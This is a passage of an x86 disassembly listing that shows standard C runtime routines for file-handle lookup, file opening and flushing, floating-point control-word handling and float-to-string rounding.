; sub_41FDB8+44�j
mov eax, [edi]
or dword ptr [eax+esi], 0FFFFFFFFh
xor eax, eax
jmp short loc_41FE2F
; ---------------------------------------------------------------------------
loc_41FE1B: ; CODE XREF: sub_41FDB8+C�j
; sub_41FDB8+2A�j ...
and ds:dword_4CD9B8, 0
mov ds:dword_4CD9B4, 9
or eax, 0FFFFFFFFh
loc_41FE2F: ; CODE XREF: sub_41FDB8+61�j
pop edi
pop esi
retn
sub_41FDB8 endp
; =============== S U B R O U T I N E =======================================
sub_41FE32 proc near ; CODE XREF: sub_41A6B7+32�p
; sub_41A6B7+49�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, ds:dword_4CEDE0
jnb short loc_41FE5A
mov ecx, eax
and eax, 1Fh
sar ecx, 5
mov ecx, ds:dword_4CECE0[ecx*4]
test byte ptr [ecx+eax*8+4], 1
lea eax, [ecx+eax*8]
jz short loc_41FE5A
mov eax, [eax]
retn
; ---------------------------------------------------------------------------
loc_41FE5A: ; CODE XREF: sub_41FE32+A�j
; sub_41FE32+23�j
and ds:dword_4CD9B8, 0
mov ds:dword_4CD9B4, 9
or eax, 0FFFFFFFFh
retn
sub_41FE32 endp
; =============== S U B R O U T I N E =======================================
sub_41FE6F proc near ; CODE XREF: sub_41A795+2B�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, ds:dword_4CEDE0
jnb short loc_41FEB8
mov ecx, eax
mov edx, eax
sar ecx, 5
and edx, 1Fh
mov ecx, ds:dword_4CECE0[ecx*4]
test byte ptr [ecx+edx*8+4], 1
jz short loc_41FEB8
push eax
call sub_41FE32
pop ecx
push eax
call ds:dword_424020 ;; FlushFileBuffers
test eax, eax
jnz short loc_41FEAD
call ds:dword_42408C ;; RtlGetLastWin32Error
jmp short loc_41FEAF
; ---------------------------------------------------------------------------
loc_41FEAD: ; CODE XREF: sub_41FE6F+34�j
xor eax, eax
loc_41FEAF: ; CODE XREF: sub_41FE6F+3C�j
test eax, eax
jz short locret_41FEC5
mov ds:dword_4CD9B8, eax
loc_41FEB8: ; CODE XREF: sub_41FE6F+A�j
; sub_41FE6F+22�j
mov ds:dword_4CD9B4, 9
or eax, 0FFFFFFFFh
locret_41FEC5: ; CODE XREF: sub_41FE6F+42�j
retn
sub_41FE6F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41FEC6 proc near ; CODE XREF: sub_41A96C+13F�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 1Ch
mov ecx, [ebp+arg_4]
push ebx
xor ebx, ebx
push esi
test cl, 80h
push edi
mov [ebp+var_1C], 0Ch
mov [ebp+var_18], ebx
jz short loc_41FEEC
mov [ebp+var_14], ebx
mov [ebp+var_1], 10h
jmp short loc_41FEF7
; ---------------------------------------------------------------------------
loc_41FEEC: ; CODE XREF: sub_41FEC6+1B�j
and [ebp+var_1], 0
mov [ebp+var_14], 1
loc_41FEF7: ; CODE XREF: sub_41FEC6+24�j
mov eax, 8000h
test ecx, eax
jnz short loc_41FF11
test ch, 40h
jnz short loc_41FF0D
cmp ds:dword_4CDC88, eax
jz short loc_41FF11
loc_41FF0D: ; CODE XREF: sub_41FEC6+3D�j
or [ebp+var_1], 80h
loc_41FF11: ; CODE XREF: sub_41FEC6+38�j
; sub_41FEC6+45�j
push 3
mov eax, ecx
pop esi
and eax, esi
sub eax, ebx
jz short loc_41FF49
dec eax
jz short loc_41FF40
dec eax
jz short loc_41FF37
loc_41FF22: ; CODE XREF: sub_41FEC6+9F�j
; sub_41FEC6+E8�j ...
mov ds:dword_4CD9B4, 16h
mov ds:dword_4CD9B8, ebx
jmp loc_42015C
; ---------------------------------------------------------------------------
loc_41FF37: ; CODE XREF: sub_41FEC6+5A�j
mov [ebp+var_C], 0C0000000h
jmp short loc_41FF50
; ---------------------------------------------------------------------------
loc_41FF40: ; CODE XREF: sub_41FEC6+57�j
mov [ebp+var_C], 40000000h
jmp short loc_41FF50
; ---------------------------------------------------------------------------
loc_41FF49: ; CODE XREF: sub_41FEC6+54�j
mov [ebp+var_C], 80000000h
loc_41FF50: ; CODE XREF: sub_41FEC6+78�j
; sub_41FEC6+81�j
mov eax, [ebp+arg_8]
cmp eax, 10h
jz short loc_41FF7E
cmp eax, 20h
jz short loc_41FF75
cmp eax, 30h
jz short loc_41FF6C
cmp eax, 40h
jnz short loc_41FF22
mov [ebp+var_10], esi
jmp short loc_41FF81
; ---------------------------------------------------------------------------
loc_41FF6C: ; CODE XREF: sub_41FEC6+9A�j
mov [ebp+var_10], 2
jmp short loc_41FF81
; ---------------------------------------------------------------------------
loc_41FF75: ; CODE XREF: sub_41FEC6+95�j
mov [ebp+var_10], 1
jmp short loc_41FF81
; ---------------------------------------------------------------------------
loc_41FF7E: ; CODE XREF: sub_41FEC6+90�j
mov [ebp+var_10], ebx
loc_41FF81: ; CODE XREF: sub_41FEC6+A4�j
; sub_41FEC6+AD�j ...
mov edx, 700h
mov eax, 400h
and ecx, edx
mov edi, 100h
cmp ecx, eax
jg short loc_41FFCB
jz short loc_41FFC6
cmp ecx, ebx
jz short loc_41FFC6
cmp ecx, edi
jz short loc_41FFBD
cmp ecx, 200h
jz short loc_41FFE4
cmp ecx, 300h
jnz loc_41FF22
mov [ebp+var_8], 2
jmp short loc_41FFF4
; ---------------------------------------------------------------------------
loc_41FFBD: ; CODE XREF: sub_41FEC6+D8�j
mov [ebp+var_8], 4
jmp short loc_41FFF4
; ---------------------------------------------------------------------------
loc_41FFC6: ; CODE XREF: sub_41FEC6+D0�j
; sub_41FEC6+D4�j
mov [ebp+var_8], esi
jmp short loc_41FFF4
; ---------------------------------------------------------------------------
loc_41FFCB: ; CODE XREF: sub_41FEC6+CE�j
cmp ecx, 500h
jz short loc_41FFED
cmp ecx, 600h
jz short loc_41FFE4
cmp ecx, edx
jz short loc_41FFED
jmp loc_41FF22
; ---------------------------------------------------------------------------
loc_41FFE4: ; CODE XREF: sub_41FEC6+E0�j
; sub_41FEC6+113�j
mov [ebp+var_8], 5
jmp short loc_41FFF4
; ---------------------------------------------------------------------------
loc_41FFED: ; CODE XREF: sub_41FEC6+10B�j
; sub_41FEC6+117�j
mov [ebp+var_8], 1
loc_41FFF4: ; CODE XREF: sub_41FEC6+F5�j
; sub_41FEC6+FE�j ...
mov eax, [ebp+arg_4]
mov esi, 80h
test eax, edi
jz short loc_420013
mov ecx, ds:dword_4CD9BC
not ecx
and ecx, [ebp+arg_C]
test cl, 80h
jnz short loc_420013
push 1
pop esi
loc_420013: ; CODE XREF: sub_41FEC6+138�j
; sub_41FEC6+148�j
test al, 40h
jz short loc_420021
or esi, 4000000h
or byte ptr [ebp+var_C+2], 1
loc_420021: ; CODE XREF: sub_41FEC6+14F�j
test ah, 10h
jz short loc_420028
or esi, edi
loc_420028: ; CODE XREF: sub_41FEC6+15E�j
test al, 20h
jz short loc_420034
or esi, 8000000h
jmp short loc_42003E
; ---------------------------------------------------------------------------
loc_420034: ; CODE XREF: sub_41FEC6+164�j
test al, 10h
jz short loc_42003E
or esi, 10000000h
loc_42003E: ; CODE XREF: sub_41FEC6+16C�j
; sub_41FEC6+170�j
call sub_41FCAC
mov ebx, eax
or edi, 0FFFFFFFFh
cmp ebx, edi
jnz short loc_42005F
and ds:dword_4CD9B8, 0
mov ds:dword_4CD9B4, 18h
jmp short loc_42009D
; ---------------------------------------------------------------------------
loc_42005F: ; CODE XREF: sub_41FEC6+184�j
push 0
push esi
push [ebp+var_8]
lea eax, [ebp+var_1C]
push eax
push [ebp+var_10]
push [ebp+var_C]
push [ebp+arg_0]
call ds:off_424084
mov esi, eax
cmp esi, edi
jz short loc_420090
push esi
call ds:dword_424030 ;; GetFileType
test eax, eax
jnz short loc_4200A4
push esi
call ds:off_424078
loc_420090: ; CODE XREF: sub_41FEC6+1B6�j
call ds:dword_42408C ;; RtlGetLastWin32Error
push eax
call sub_41EF44
pop ecx
loc_42009D: ; CODE XREF: sub_41FEC6+197�j
mov eax, edi
jmp loc_42017A
; ---------------------------------------------------------------------------
loc_4200A4: ; CODE XREF: sub_41FEC6+1C1�j
cmp eax, 2
jnz short loc_4200AF
or [ebp+var_1], 40h
jmp short loc_4200B8
; ---------------------------------------------------------------------------
loc_4200AF: ; CODE XREF: sub_41FEC6+1E1�j
cmp eax, 3
jnz short loc_4200B8
or [ebp+var_1], 8
loc_4200B8: ; CODE XREF: sub_41FEC6+1E7�j
; sub_41FEC6+1EC�j
push esi
push ebx
call sub_41FD41
pop ecx
mov al, [ebp+var_1]
pop ecx
mov esi, ebx
mov ecx, ebx
or al, 1
sar ecx, 5
and esi, 1Fh
mov byte ptr [ebp+arg_0+3], al
lea edi, ds:4CECE0h[ecx*4]
shl esi, 3
mov ecx, [edi]
and byte ptr [ebp+arg_0+3], 48h
mov [ecx+esi+4], al
jnz short loc_420161
test al, 80h
jz short loc_420161
test byte ptr [ebp+arg_4], 2
jz short loc_420161
push 2
push 0FFFFFFFFh
push ebx
call sub_41E517
add esp, 0Ch
cmp eax, 0FFFFFFFFh
mov [ebp+var_10], eax
jnz short loc_420116
cmp ds:dword_4CD9B8, 83h
jz short loc_420161
jmp short loc_420155
; ---------------------------------------------------------------------------
loc_420116: ; CODE XREF: sub_41FEC6+240�j
and byte ptr [ebp+arg_8+3], 0
lea eax, [ebp+arg_8+3]
push 1
push eax
push ebx
call sub_41E321
add esp, 0Ch
test eax, eax
jnz short loc_420143
cmp byte ptr [ebp+arg_8+3], 1Ah
jnz short loc_420143
push [ebp+var_10]
push ebx
call sub_4211F1
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_420155
loc_420143: ; CODE XREF: sub_41FEC6+265�j
; sub_41FEC6+26B�j
push 0
push 0
push ebx
call sub_41E517
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jnz short loc_420161
loc_420155: ; CODE XREF: sub_41FEC6+24E�j
; sub_41FEC6+27B�j
push ebx
call sub_41A6B7
pop ecx
loc_42015C: ; CODE XREF: sub_41FEC6+6C�j
or eax, 0FFFFFFFFh
jmp short loc_42017A
; ---------------------------------------------------------------------------
loc_420161: ; CODE XREF: sub_41FEC6+221�j
; sub_41FEC6+225�j ...
cmp byte ptr [ebp+arg_0+3], 0
jnz short loc_420178
test byte ptr [ebp+arg_4], 8
jz short loc_420178
mov eax, [edi]
or byte ptr [eax+esi+4], 20h
lea eax, [eax+esi+4]
loc_420178: ; CODE XREF: sub_41FEC6+29F�j
; sub_41FEC6+2A5�j
mov eax, ebx
loc_42017A: ; CODE XREF: sub_41FEC6+1D9�j
; sub_41FEC6+299�j
pop edi
pop esi
pop ebx
leave
retn
sub_41FEC6 endp
; =============== S U B R O U T I N E =======================================
sub_42017F proc near ; CODE XREF: sub_41C50A+52�p
xor eax, eax
retn
sub_42017F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420182 proc near ; CODE XREF: sub_4201B7+E�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
fstcw word ptr [ebp+var_4]
push [ebp+var_4]
call sub_4201CD
mov esi, eax
mov eax, [ebp+arg_4]
not eax
and esi, eax
mov eax, [ebp+arg_0]
and eax, [ebp+arg_4]
or esi, eax
push esi
call sub_42025F
pop ecx
mov [ebp+arg_4], eax
pop ecx
fldcw word ptr [ebp+arg_4]
mov eax, esi
pop esi
leave
retn
sub_420182 endp
; =============== S U B R O U T I N E =======================================
sub_4201B7 proc near ; CODE XREF: sub_41C7F6+A�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
and eax, 0FFF7FFFFh
push eax
push [esp+4+arg_0]
call sub_420182
pop ecx
pop ecx
retn
sub_4201B7 endp
; =============== S U B R O U T I N E =======================================
sub_4201CD proc near ; CODE XREF: sub_420182+C�p
arg_0 = dword ptr 4
push ebx
mov ebx, [esp+4+arg_0]
xor eax, eax
push ebp
test bl, 1
push edi
jz short loc_4201DE
push 10h
pop eax
loc_4201DE: ; CODE XREF: sub_4201CD+C�j
test bl, 4
jz short loc_4201E5
or al, 8
loc_4201E5: ; CODE XREF: sub_4201CD+14�j
test bl, 8
jz short loc_4201EC
or al, 4
loc_4201EC: ; CODE XREF: sub_4201CD+1B�j
test bl, 10h
jz short loc_4201F3
or al, 2
loc_4201F3: ; CODE XREF: sub_4201CD+22�j
test bl, 20h
jz short loc_4201FA
or al, 1
loc_4201FA: ; CODE XREF: sub_4201CD+29�j
test bl, 2
jz short loc_420204
or eax, 80000h
loc_420204: ; CODE XREF: sub_4201CD+30�j
movzx ecx, bx
push esi
mov edx, ecx
mov esi, 0C00h
mov edi, 300h
and edx, esi
mov ebp, 200h
jz short loc_42023C
cmp edx, 400h
jz short loc_420239
cmp edx, 800h
jz short loc_420235
cmp edx, esi
jnz short loc_42023C
or eax, edi
jmp short loc_42023C
; ---------------------------------------------------------------------------
loc_420235: ; CODE XREF: sub_4201CD+5E�j
or eax, ebp
jmp short loc_42023C
; ---------------------------------------------------------------------------
loc_420239: ; CODE XREF: sub_4201CD+56�j
or ah, 1
loc_42023C: ; CODE XREF: sub_4201CD+4E�j
; sub_4201CD+62�j ...
and ecx, edi
pop esi
jz short loc_42024C
cmp ecx, ebp
jnz short loc_420251
or eax, 10000h
jmp short loc_420251
; ---------------------------------------------------------------------------
loc_42024C: ; CODE XREF: sub_4201CD+72�j
or eax, 20000h
loc_420251: ; CODE XREF: sub_4201CD+76�j
; sub_4201CD+7D�j
pop edi
pop ebp
test bh, 10h
pop ebx
jz short locret_42025E
or eax, 40000h
locret_42025E: ; CODE XREF: sub_4201CD+8A�j
retn
sub_4201CD endp
; =============== S U B R O U T I N E =======================================
sub_42025F proc near ; CODE XREF: sub_420182+23�p
arg_0 = dword ptr 4
push ebx
mov ebx, [esp+4+arg_0]
xor eax, eax
push esi
test bl, 10h
jz short loc_42026F
push 1
pop eax
loc_42026F: ; CODE XREF: sub_42025F+B�j
test bl, 8
jz short loc_420276
or al, 4
loc_420276: ; CODE XREF: sub_42025F+13�j
test bl, 4
jz short loc_42027D
or al, 8
loc_42027D: ; CODE XREF: sub_42025F+1A�j
test bl, 2
jz short loc_420284
or al, 10h
loc_420284: ; CODE XREF: sub_42025F+21�j
test bl, 1
jz short loc_42028B
or al, 20h
loc_42028B: ; CODE XREF: sub_42025F+28�j
test ebx, 80000h
jz short loc_420295
or al, 2
loc_420295: ; CODE XREF: sub_42025F+32�j
mov ecx, ebx
mov edx, 300h
and ecx, edx
mov esi, 200h
jz short loc_4202C2
cmp ecx, 100h
jz short loc_4202BF
cmp ecx, esi
jz short loc_4202BA
cmp ecx, edx
jnz short loc_4202C2
or ah, 0Ch
jmp short loc_4202C2
; ---------------------------------------------------------------------------
loc_4202BA: ; CODE XREF: sub_42025F+50�j
or ah, 8
jmp short loc_4202C2
; ---------------------------------------------------------------------------
loc_4202BF: ; CODE XREF: sub_42025F+4C�j
or ah, 4
loc_4202C2: ; CODE XREF: sub_42025F+44�j
; sub_42025F+54�j ...
mov ecx, ebx
and ecx, 30000h
jz short loc_4202D8
cmp ecx, 10000h
jnz short loc_4202DA
or eax, esi
jmp short loc_4202DA
; ---------------------------------------------------------------------------
loc_4202D8: ; CODE XREF: sub_42025F+6B�j
or eax, edx
loc_4202DA: ; CODE XREF: sub_42025F+73�j
; sub_42025F+77�j
pop esi
test ebx, 40000h
pop ebx
jz short locret_4202E7
or ah, 10h
locret_4202E7: ; CODE XREF: sub_42025F+83�j
retn
sub_42025F endp
; =============== S U B R O U T I N E =======================================
sub_4202E8 proc near ; CODE XREF: sub_420387+48�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
push esi
push 20h
cdq
pop ecx
idiv ecx
push 1Fh
mov esi, eax
mov eax, [esp+8+arg_4]
cdq
idiv ecx
pop ecx
mov eax, [esp+4+arg_0]
sub ecx, edx
or edx, 0FFFFFFFFh
shl edx, cl
not edx
test [eax+esi*4], edx
jnz short loc_42032D
inc esi
cmp esi, 3
jge short loc_420328
lea eax, [eax+esi*4]
loc_42031A: ; CODE XREF: sub_4202E8+3E�j
cmp dword ptr [eax], 0
jnz short loc_42032D
inc esi
add eax, 4
cmp esi, 3
jl short loc_42031A
loc_420328: ; CODE XREF: sub_4202E8+2D�j
push 1
pop eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_42032D: ; CODE XREF: sub_4202E8+27�j
; sub_4202E8+35�j
xor eax, eax
pop esi
retn
sub_4202E8 endp
; =============== S U B R O U T I N E =======================================
sub_420331 proc near ; CODE XREF: sub_420387+57�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
push ebx
push esi
push edi
push 20h
mov ebx, [esp+10h+arg_0]
cdq
pop ecx
idiv ecx
mov esi, eax
mov eax, [esp+0Ch+arg_4]
cdq
idiv ecx
lea edi, [ebx+esi*4]
push edi
push 1Fh
pop ecx
push 1
pop eax
sub ecx, edx
shl eax, cl
push eax
push dword ptr [edi]
call sub_421337
add esp, 0Ch
dec esi
js short loc_420383
lea edi, [ebx+esi*4]
loc_42036A: ; CODE XREF: sub_420331+50�j
test eax, eax
jz short loc_420383
push edi
push 1
push dword ptr [edi]
call sub_421337
add esp, 0Ch
dec esi
sub edi, 4
test esi, esi
jge short loc_42036A
loc_420383: ; CODE XREF: sub_420331+34�j
; sub_420331+3B�j
pop edi
pop esi
pop ebx
retn
sub_420331 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420387 proc near ; CODE XREF: sub_4204E2+81�p
; sub_4204E2+CC�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_4]
push ebx
push esi
push edi
lea edi, [eax-1]
push 20h
pop ecx
and [ebp+var_4], 0
lea ebx, [edi+1]
push 20h
mov eax, ebx
pop esi
cdq
idiv ecx
push 1Fh
mov ecx, eax
mov eax, ebx
cdq
idiv esi
mov eax, [ebp+arg_0]
pop esi
push 1
mov [ebp+var_8], ecx
lea eax, [eax+ecx*4]
mov [ebp+arg_4], eax
sub esi, edx
pop edx
mov ecx, esi
shl edx, cl
test [eax], edx
jz short loc_4203EB
inc ebx
push ebx
push [ebp+arg_0]
call sub_4202E8
pop ecx
test eax, eax
pop ecx
jnz short loc_4203E8
push edi
push [ebp+arg_0]
call sub_420331
pop ecx
mov [ebp+var_4], eax
pop ecx
loc_4203E8: ; CODE XREF: sub_420387+51�j
mov eax, [ebp+arg_4]
loc_4203EB: ; CODE XREF: sub_420387+41�j
or edx, 0FFFFFFFFh
mov ecx, esi
shl edx, cl
push 3
pop ecx
and [eax], edx
mov eax, [ebp+var_8]
inc eax
cmp eax, ecx
jge short loc_42040B
mov edx, [ebp+arg_0]
sub ecx, eax
lea edi, [edx+eax*4]
xor eax, eax
rep stosd
loc_42040B: ; CODE XREF: sub_420387+76�j
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_420387 endp
; =============== S U B R O U T I N E =======================================
sub_420413 proc near ; CODE XREF: sub_4204E2+75�p
; sub_4204E2+B6�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
mov ecx, [esp+arg_0]
push esi
push 3
sub ecx, eax
pop edx
loc_420421: ; CODE XREF: sub_420413+17�j
mov esi, [eax]
mov [ecx+eax], esi
add eax, 4
dec edx
jnz short loc_420421
pop esi
retn
sub_420413 endp
; =============== S U B R O U T I N E =======================================
sub_42042E proc near ; CODE XREF: sub_4204E2+5F�p
; sub_4204E2+9E�p ...
arg_0 = dword ptr 4
push edi
mov edi, [esp+4+arg_0]
xor eax, eax
stosd
stosd
stosd
pop edi
retn
sub_42042E endp
; =============== S U B R O U T I N E =======================================
sub_42043A proc near ; CODE XREF: sub_4204E2+4D�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
xor ecx, ecx
loc_420440: ; CODE XREF: sub_42043A+12�j
cmp dword ptr [eax], 0
jnz short loc_420452
inc ecx
add eax, 4
cmp ecx, 3
jl short loc_420440
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_420452: ; CODE XREF: sub_42043A+9�j
xor eax, eax
retn
sub_42043A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420455 proc near ; CODE XREF: sub_4204E2+C0�p
; sub_4204E2+DA�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+arg_4]
push ebx
push esi
push edi
push 20h
mov edi, [ebp+arg_0]
pop ebx
or esi, 0FFFFFFFFh
cdq
mov ecx, ebx
mov [ebp+var_4], 3
idiv ecx
mov [ebp+var_C], eax
mov eax, [ebp+arg_4]
cdq
idiv ecx
and [ebp+arg_4], 0
mov ecx, edx
shl esi, cl
sub ebx, edx
not esi
loc_42048B: ; CODE XREF: sub_420455+58�j
mov eax, [edi]
mov ecx, eax
and ecx, esi
mov [ebp+var_8], ecx
mov ecx, edx
shr eax, cl
or eax, [ebp+arg_4]
mov [edi], eax
mov eax, [ebp+var_8]
mov ecx, ebx
add edi, 4
shl eax, cl
dec [ebp+var_4]
mov [ebp+arg_4], eax
jnz short loc_42048B
mov edi, [ebp+var_C]
push 2
pop ebx
mov esi, edi
push 8
pop ecx
shl esi, 2
loc_4204BD: ; CODE XREF: sub_420455+86�j
cmp ebx, edi
jl short loc_4204D0
mov edx, [ebp+arg_0]
mov eax, ecx
sub eax, esi
mov eax, [eax+edx]
mov [ecx+edx], eax
jmp short loc_4204D7
; ---------------------------------------------------------------------------
loc_4204D0: ; CODE XREF: sub_420455+6A�j
mov eax, [ebp+arg_0]
and dword ptr [ecx+eax], 0
loc_4204D7: ; CODE XREF: sub_420455+79�j
dec ebx
sub ecx, 4
jns short loc_4204BD
pop edi
pop esi
pop ebx
leave
retn
sub_420455 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4204E2 proc near ; CODE XREF: sub_42064E+D�p
; sub_420664+D�p
var_18 = byte ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 18h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
movzx ecx, word ptr [eax+0Ah]
mov ebx, ecx
and ecx, 8000h
mov [ebp+arg_0], ecx
mov ecx, [eax+6]
mov [ebp+var_C], ecx
mov ecx, [eax+2]
movzx eax, word ptr [eax]
mov edi, [ebp+arg_8]
and ebx, 7FFFh
sub ebx, 3FFFh
mov [ebp+var_8], ecx
shl eax, 10h
cmp ebx, 0FFFFC001h
mov [ebp+var_4], eax
jnz short loc_42054F
lea eax, [ebp+var_C]
xor esi, esi
push eax
call sub_42043A
test eax, eax
pop ecx
jnz loc_42060E
lea eax, [ebp+var_C]
push eax
call sub_42042E
pop ecx
loc_420547: ; CODE XREF: sub_4204E2+E4�j
push 2
loc_420549: ; CODE XREF: sub_4204E2+110�j
pop eax
jmp loc_420610
; ---------------------------------------------------------------------------
loc_42054F: ; CODE XREF: sub_4204E2+45�j
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_18]
push eax
call sub_420413
push dword ptr [edi+8]
lea eax, [ebp+var_C]
push eax
call sub_420387
add esp, 10h
test eax, eax
jz short loc_420570
inc ebx
loc_420570: ; CODE XREF: sub_4204E2+8B�j
mov eax, [edi+4]
mov ecx, eax
sub ecx, [edi+8]
cmp ebx, ecx
jge short loc_420588
lea eax, [ebp+var_C]
push eax
call sub_42042E
pop ecx
jmp short loc_4205C4
; ---------------------------------------------------------------------------
loc_420588: ; CODE XREF: sub_4204E2+98�j
cmp ebx, eax
jg short loc_4205CB
sub eax, ebx
mov esi, eax
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_C]
push eax
call sub_420413
lea eax, [ebp+var_C]
push esi
push eax
call sub_420455
push dword ptr [edi+8]
lea eax, [ebp+var_C]
push eax
call sub_420387
mov eax, [edi+0Ch]
inc eax
push eax
lea eax, [ebp+var_C]
push eax
call sub_420455
add esp, 20h
loc_4205C4: ; CODE XREF: sub_4204E2+A4�j
xor esi, esi
jmp loc_420547
; ---------------------------------------------------------------------------
loc_4205CB: ; CODE XREF: sub_4204E2+A8�j
cmp ebx, [edi]
jl short loc_4205F7
lea eax, [ebp+var_C]
push eax
call sub_42042E
push dword ptr [edi+0Ch]
or byte ptr [ebp+var_C+3], 80h
lea eax, [ebp+var_C]
push eax
call sub_420455
mov esi, [edi+14h]
add esp, 0Ch
add esi, [edi]
push 1
jmp loc_420549
; ---------------------------------------------------------------------------
loc_4205F7: ; CODE XREF: sub_4204E2+EB�j
push dword ptr [edi+0Ch]
mov esi, [edi+14h]
and byte ptr [ebp+var_C+3], 7Fh
lea eax, [ebp+var_C]
push eax
add esi, ebx
call sub_420455
pop ecx
pop ecx
loc_42060E: ; CODE XREF: sub_4204E2+55�j
xor eax, eax
loc_420610: ; CODE XREF: sub_4204E2+68�j
push 1Fh
pop ecx
sub ecx, [edi+0Ch]
mov edi, [edi+10h]
shl esi, cl
mov ecx, [ebp+arg_0]
neg ecx
sbb ecx, ecx
and ecx, 80000000h
or esi, ecx
or esi, [ebp+var_C]
cmp edi, 40h
jnz short loc_42063F
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_8]
mov [ecx+4], esi
mov [ecx], edx
jmp short loc_420649
; ---------------------------------------------------------------------------
loc_42063F: ; CODE XREF: sub_4204E2+14E�j
cmp edi, 20h
jnz short loc_420649
mov ecx, [ebp+arg_4]
mov [ecx], esi
loc_420649: ; CODE XREF: sub_4204E2+15B�j
; sub_4204E2+160�j
pop edi
pop esi
pop ebx
leave
retn
sub_4204E2 endp
; =============== S U B R O U T I N E =======================================
sub_42064E proc near ; CODE XREF: sub_42067A+23�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push offset dword_436610
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_4204E2
add esp, 0Ch
retn
sub_42064E endp
; =============== S U B R O U T I N E =======================================
sub_420664 proc near ; CODE XREF: sub_4206A7+23�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push offset dword_436628
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_4204E2
add esp, 0Ch
retn
sub_420664 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42067A proc near ; CODE XREF: sub_41C92F+12�p
var_C = byte ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
xor eax, eax
push eax
push eax
push eax
push eax
push [ebp+arg_4]
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+var_C]
push eax
call sub_4214D8
push [ebp+arg_0]
lea eax, [ebp+var_C]
push eax
call sub_42064E
add esp, 24h
leave
retn
sub_42067A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4206A7 proc near ; CODE XREF: sub_41C92F+2D�p
var_C = byte ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
xor eax, eax
push eax
push eax
push eax
push eax
push [ebp+arg_4]
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+var_C]
push eax
call sub_4214D8
push [ebp+arg_0]
lea eax, [ebp+var_C]
push eax
call sub_420664
add esp, 24h
leave
retn
sub_4206A7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4206D4 proc near ; CODE XREF: sub_41C96D+65�p
; sub_41CA71+63�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov edx, [ebp+arg_8]
push ebx
mov ebx, [ebp+arg_4]
push esi
mov esi, [ebp+arg_0]
mov ecx, [edx+0Ch]
push edi
lea edi, [esi+1]
mov byte ptr [esi], 30h
test ebx, ebx
mov eax, edi
jle short loc_420711
mov [ebp+arg_0], ebx
xor ebx, ebx
loc_4206F7: ; CODE XREF: sub_4206D4+38�j
mov dl, [ecx]
test dl, dl
jz short loc_420703
movsx edx, dl
inc ecx
jmp short loc_420706
; ---------------------------------------------------------------------------
loc_420703: ; CODE XREF: sub_4206D4+27�j
push 30h
pop edx
loc_420706: ; CODE XREF: sub_4206D4+2D�j
mov [eax], dl
inc eax
dec [ebp+arg_0]
jnz short loc_4206F7
mov edx, [ebp+arg_8]
loc_420711: ; CODE XREF: sub_4206D4+1C�j
and byte ptr [eax], 0
test ebx, ebx
jl short loc_42072A
cmp byte ptr [ecx], 35h
jl short loc_42072A
loc_42071D: ; CODE XREF: sub_4206D4+52�j
dec eax
cmp byte ptr [eax], 39h
jnz short loc_420728
mov byte ptr [eax], 30h
jmp short loc_42071D
; ---------------------------------------------------------------------------
loc_420728: ; CODE XREF: sub_4206D4+4D�j
inc byte ptr [eax]
loc_42072A: ; CODE XREF: sub_4206D4+42�j
; sub_4206D4+47�j
cmp byte ptr [esi], 31h
jnz short loc_420734
inc dword ptr [edx+4]
jmp short loc_420746
; ---------------------------------------------------------------------------
loc_420734: ; CODE XREF: sub_4206D4+59�j
push edi
